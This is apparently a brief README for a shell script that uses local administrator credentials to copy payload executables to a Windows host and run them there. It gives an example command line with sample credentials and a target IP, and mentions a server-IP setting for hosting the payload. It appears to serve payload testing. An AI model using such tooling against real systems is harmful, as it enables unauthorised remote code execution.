Automatically transfer and execute the payload binaries to target windows system.
Use creds for a local admin user(Any user who is part of Administrators group) in windows.
./payload-tester.sh <username> <password> <target-ip> <payload.exe>
Example-
./payload-tester.sh test "Te$terte$t@123" 192.168.146.8 RESONANT_FORECAST.exe
Change the serverip varible if you are not having public ip.